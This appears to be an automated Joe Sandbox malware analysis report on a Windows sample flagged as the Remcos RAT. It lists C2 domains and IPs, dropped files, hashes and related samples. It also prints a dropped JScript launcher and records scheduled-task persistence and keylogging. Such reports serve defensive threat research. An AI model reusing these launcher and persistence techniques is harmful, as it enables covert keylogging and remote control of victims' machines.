    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578615 Sample: nikDoCvpJa.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 57 wnBHxhzUAWNxsjrpdZtUkwTu.wnBHxhzUAWNxsjrpdZtUkwTu 2->57 59 navegacionseguracol24vip.org 2->59 61 geoplugin.net 2->61 71 Suricata IDS alerts for network traffic 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 Yara detected Remcos RAT 2->75 77 7 other signatures 2->77 10 nikDoCvpJa.exe 31 2->10         started        12 wscript.exe 1 2->12         started        15 wscript.exe 2->15         started        signatures3 process4 signatures5 17 cmd.exe 3 10->17         started        83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->83 21 CyberScope.com 12->21         started        23 CyberScope.com 15->23         started        process6 file7 47 C:\Users\user\AppData\Local\Temp\...\Beth.com, PE32 17->47 dropped 67 Drops PE files with a suspicious file extension 17->67 69 Uses schtasks.exe or at.exe to add and modify task schedules 17->69 25 Beth.com 3 19 17->25         started        30 cmd.exe 2 17->30         started        32 conhost.exe 17->32         started        34 7 other processes 17->34 signatures8 process9 dnsIp10 63 navegacionseguracol24vip.org 181.131.217.244, 3021, 49804 EPMTelecomunicacionesSAESPCO Colombia 25->63 65 geoplugin.net 178.237.33.50, 49810, 80 ATOM86-ASATOM86NL Netherlands 25->65 51 C:\Users\user\AppData\...\CyberScope.com, PE32 25->51 dropped 53 C:\Users\user\AppData\Local\...\CyberScope.js, ASCII 25->53 dropped 55 C:\ProgramData\data\registros.dat, data 25->55 dropped 79 Drops PE files with a suspicious file extension 25->79 81 Installs a global keyboard hook 25->81 36 cmd.exe 2 25->36         started        39 cmd.exe 1 25->39         started        file11 signatures12 process13 file14 49 C:\Users\user\AppData\...\CyberScope.url, MS 36->49 dropped 41 conhost.exe 36->41         started        43 conhost.exe 39->43         started        45 schtasks.exe 1 39->45         started        process15

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    nikDoCvpJa.exe26%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\638933\Beth.com0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    navegacionseguracol24vip.org
    181.131.217.244
    truefalse
      high
      geoplugin.net
      178.237.33.50
      truefalse
        high
        wnBHxhzUAWNxsjrpdZtUkwTu.wnBHxhzUAWNxsjrpdZtUkwTu
        unknown
        unknowntrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://geoplugin.net/json.gpfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.autoitscript.com/autoit3/XBeth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000000.2162090639.0000000000895000.00000002.00000001.01000000.00000007.sdmp, CyberScope.com, 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmp, CyberScope.com, 00000016.00000000.2276662268.0000000000265000.00000002.00000001.01000000.00000009.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drfalse
              high
              http://nsis.sf.net/NSIS_ErrorErrornikDoCvpJa.exefalse
                high
                http://crl.thawte.com/ThawteTimestampingCA.crl0nikDoCvpJa.exefalse
                  high
                  https://www.autoitscript.com/autoit3/Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drfalse
                    high
                    http://ocsp.thawte.com0nikDoCvpJa.exefalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      181.131.217.244
                      navegacionseguracol24vip.orgColombia
                      13489EPMTelecomunicacionesSAESPCOfalse
                      178.237.33.50
                      geoplugin.netNetherlands
                      8455ATOM86-ASATOM86NLfalse
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1578615
                      Start date and time:2024-12-19 23:41:07 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 33s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:24
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:nikDoCvpJa.exe
                      renamed because original name is a hash value
                      Original Sample Name:d2729f574a3ba69a10c00a5992986226.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winEXE@36/29@3/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 80
                      • Number of non-executed functions: 310
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • VT rate limit hit for: nikDoCvpJa.exe
                      TimeTypeDescription
                      17:42:04API Interceptor1x Sleep call for process: nikDoCvpJa.exe modified
                      17:42:46API Interceptor261563x Sleep call for process: Beth.com modified
                      23:42:10Task SchedulerRun new task: Config path: wscript s>//B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js"
                      23:42:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      181.131.217.2444JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                        fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                          hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                            IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                              4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                  fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                    3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                      ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                        pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                          178.237.33.5017346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                          • geoplugin.net/json.gp
                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                          • geoplugin.net/json.gp
                                          RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                          • geoplugin.net/json.gp
                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • geoplugin.net/json.gp
                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • geoplugin.net/json.gp
                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • geoplugin.net/json.gp
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          navegacionseguracol24vip.org4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                          • 181.131.217.244
                                          hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                          • 181.131.217.244
                                          IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                          • 181.131.217.244
                                          4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                          • 181.131.217.244
                                          d7gXUPUl38.exeGet hashmaliciousRemcosBrowse
                                          • 181.131.217.244
                                          3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                          • 181.131.217.244
                                          ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                          • 181.131.217.244
                                          pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                          • 181.131.217.244
                                          hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                          • 181.131.217.244
                                          ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                          • 181.131.217.244
                                          geoplugin.net17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                          • 178.237.33.50
                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                          • 178.237.33.50
                                          RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          EPMTelecomunicacionesSAESPCOx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 190.250.82.196
                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 201.233.155.11
                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                          • 201.233.213.88
                                          arm5.nn-20241218-1651.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 201.232.1.208
                                          la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                          • 181.134.107.144
                                          loligang.x86.elfGet hashmaliciousMiraiBrowse
                                          • 181.130.255.187
                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 181.140.1.158
                                          jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 181.135.96.108
                                          arm5.elfGet hashmaliciousUnknownBrowse
                                          • 191.94.11.254
                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 181.128.127.248
                                          ATOM86-ASATOM86NL17346150108fd59162a7f50db4b74cc85f1873b39cc8eaeab355e353b3b8b18e8e21fd369d493.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          SEPTobn3BR.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                          • 178.237.33.50
                                          greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                          • 178.237.33.50
                                          RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comdownloaded_exe.exeGet hashmaliciousRHADAMANTHYSBrowse
                                            Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                              main.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                deb.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                  pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                    QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                      'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                        CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                          CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                            Setup.msiGet hashmaliciousVidarBrowse
                                                              C:\Users\user\AppData\Local\Temp\638933\Beth.comdownloaded_exe.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                  main.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                    deb.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                      pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                        QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                          'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                              CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                Setup.msiGet hashmaliciousVidarBrowse
                                                                                  Process:C:\Users\user\AppData\Local\Temp\638933\Beth.com
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):184
                                                                                  Entropy (8bit):3.375175391562378
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:rhlKlyKHlfUlWJF+rQ55JWRal2Jl+7R0DAlBG4phlKlyKHlfUlWJF+mPQblovDlA:6lZHl8RE55YcIeeDAlMlZHl8RPbWAv
                                                                                  MD5:476F1747F69532F4F7BA0AE5031CB0F7
                                                                                  SHA1:E1E94D75DA26286D1D4859222F34F4D32155426B
                                                                                  SHA-256:D828C3C97B1E576A022F5A47700D30A8720B8D370421188044D9E9EB19728CF5
                                                                                  SHA-512:BCE05D0307D9DC394E08D055BD26C91843AF3359F6D49B96C7A785F8BF5BBBF08DBBB4E486C7AD0551CCB65987A06486853A6C43C80D9F048A3BDC26D5187818
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\data\registros.dat, Author: Joe Security
                                                                                  Preview:....[.2.0.2.4./.1.2./.1.9. .1.7.:.4.2.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.1.9. .1.7.:.4.2.:.5.7. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                  Process:C:\Users\user\AppData\Local\Temp\638933\Beth.com
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):963
                                                                                  Entropy (8bit):5.018384957371898
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                                  MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                                  SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                                  SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                                  SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                                  Malicious:false
                                                                                  Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                  Process:C:\Users\user\AppData\Local\Temp\638933\Beth.com
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):947288
                                                                                  Entropy (8bit):6.630612696399572
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: downloaded_exe.exe, Detection: malicious, Browse
                                                                                  • Filename: Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnk, Detection: malicious, Browse
                                                                                  • Filename: main.exe, Detection: malicious, Browse
                                                                                  • Filename: deb.exe, Detection: malicious, Browse
                                                                                  • Filename: pM3fQBuTLy.exe, Detection: malicious, Browse
                                                                                  • Filename: QIo3SytSZA.exe, Detection: malicious, Browse
                                                                                  • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                                  • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                  • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                  • Filename: Setup.msi, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\638933\Beth.com
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):181
                                                                                  Entropy (8bit):4.638378348159726
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD52AGqdecwI2qL4Gf5uWAX+aJp6/h4EkD528:RiJBJHonwWDaJ0/hJkDd4c9H4GfwWDap
                                                                                  MD5:DD338F0FA02C4DFF5AB20F483E22E4D0
                                                                                  SHA1:F5EBA73BC4A348EB8FDFC05F4B25FDCAC4CB52C3
                                                                                  SHA-256:6B272AE9749A6BE3BB7FC8A0C99B43EBB4B94444A1758120763587FF7FA5F704
                                                                                  SHA-512:EDBCC169D87C71F50252E5355F220416007BA34997C7986CD1B6FDDA473FA56DE2A98638ABFDBB311886AF2C4D3A7B48F4C1A8A542B6E7438B4459E21C09F5D8
                                                                                  Malicious:true
                                                                                  Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\SecureScope Dynamics\\CyberScope.com\" \"C:\\Users\\user\\AppData\\Local\\SecureScope Dynamics\\r\"")
                                                                                  Process:C:\Users\user\AppData\Local\Temp\638933\Beth.com
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):704760
                                                                                  Entropy (8bit):7.999709425894182
                                                                                  Encrypted:true
                                                                                  SSDEEP:12288:t5LTwLcScZ0OkRjdOctZcUs15SLkVczFWAAQo8B5TfzcjHmpuciLSprWJ1sS:DwLczZ0OIdOctE1SkiKQoiLcr4sLarI
                                                                                  MD5:113965F1186BD15CDA1811E65B6E617E
                                                                                  SHA1:92257A886927D514AA62A33DE95EAFCBF47B4E73
                                                                                  SHA-256:484A1F01CA5B64ED9804F008C681621E546A2DB7481D182C77DDD33543B933E7
                                                                                  SHA-512:FE24FDCD84EB35EAFFE507E7BD1D8D36014DB9067144F0308810770CB06DBBF0D0F8919EF57B8DD2703412F398EA85D1BCF47C3CCD0D03ED224495A992B6D55C
                                                                                  Malicious:false
                                                                                  Preview:j..Ix..+.A.vs.e.;.U.A...T.b.T.4(.h<.~..X?/C.s..Y8Z.E.(@.=$ep........S.*............Rj.?..@..X6......./-Im..b........0..O.<...[......"=.;(L..`.>..zk........6.]T.......e^..|.S.N....0Y...../"b..........F.x.....a.Bs.N.p...iC.a..aU.Q.&.*.E#L.-.U....G..F..@x.J[..8g.5...uj;.M...Q...N....P...f..>..V .m..h....'.N.R.....c26..r..QC.......U.V..+^.z://..9<.t7...w...,.D.q..T...G..s.m."0..}...._.(.?02.5.......,,.e....{Uiy...K/..e...`.......!.d~Fna../....nv.....H.%R,w:-..[wH...H......C...Tg.K>....>+..&...hd.ud....<.x..S.....E.j=..v...m..-..k.9...}!.\.`@..YK.AwVJ..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....5.<.'.F...h.............mQ..a^..mQ..a^..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E
                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):947288
                                                                                  Entropy (8bit):6.630612696399572
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: downloaded_exe.exe, Detection: malicious, Browse
                                                                                  • Filename: Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnk, Detection: malicious, Browse
                                                                                  • Filename: main.exe, Detection: malicious, Browse
                                                                                  • Filename: deb.exe, Detection: malicious, Browse
                                                                                  • Filename: pM3fQBuTLy.exe, Detection: malicious, Browse
                                                                                  • Filename: QIo3SytSZA.exe, Detection: malicious, Browse
                                                                                  • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                                  • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                  • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                  • Filename: Setup.msi, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):704760
                                                                                  Entropy (8bit):7.999709425894182
                                                                                  Encrypted:true
                                                                                  SSDEEP:12288:t5LTwLcScZ0OkRjdOctZcUs15SLkVczFWAAQo8B5TfzcjHmpuciLSprWJ1sS:DwLczZ0OIdOctE1SkiKQoiLcr4sLarI
                                                                                  MD5:113965F1186BD15CDA1811E65B6E617E
                                                                                  SHA1:92257A886927D514AA62A33DE95EAFCBF47B4E73
                                                                                  SHA-256:484A1F01CA5B64ED9804F008C681621E546A2DB7481D182C77DDD33543B933E7
                                                                                  SHA-512:FE24FDCD84EB35EAFFE507E7BD1D8D36014DB9067144F0308810770CB06DBBF0D0F8919EF57B8DD2703412F398EA85D1BCF47C3CCD0D03ED224495A992B6D55C
                                                                                  Malicious:false
                                                                                  Preview:j..Ix..+.A.vs.e.;.U.A...T.b.T.4(.h<.~..X?/C.s..Y8Z.E.(@.=$ep........S.*............Rj.?..@..X6......./-Im..b........0..O.<...[......"=.;(L..`.>..zk........6.]T.......e^..|.S.N....0Y...../"b..........F.x.....a.Bs.N.p...iC.a..aU.Q.&.*.E#L.-.U....G..F..@x.J[..8g.5...uj;.M...Q...N....P...f..>..V .m..h....'.N.R.....c26..r..QC.......U.V..+^.z://..9<.t7...w...,.D.q..T...G..s.m."0..}...._.(.?02.5.......,,.e....{Uiy...K/..e...`.......!.d~Fna../....nv.....H.%R,w:-..[wH...H......C...Tg.K>....>+..&...hd.ud....<.x..S.....E.j=..v...m..-..k.9...}!.\.`@..YK.AwVJ..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....5.<.'.F...h.............mQ..a^..mQ..a^..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):62464
                                                                                  Entropy (8bit):7.997298797317556
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:wzzclvuRytW/vqWUdgGeRiE4skenrby1m1gBJk9X3QeqXQAfD7z:SygqyvggNMlFobMm1u2XlqAAPz
                                                                                  MD5:154FCC1926F23A7CC005231522018EF9
                                                                                  SHA1:3E661EB13B7C61E3E4880CA3EBDA7883106C5F83
                                                                                  SHA-256:C6B562B5D0241C9823116ECF30FF42D3E764755264E26FE32445C4DFB346A6BA
                                                                                  SHA-512:DF382B9255344006A98042FAD3BDB3C6DC6D729CCD8AF28005623CA9F15FFE18F0697E2DB31D652301919B17C6411EF608D4CDCF5A637A1DF96C27C597D85A4C
                                                                                  Malicious:false
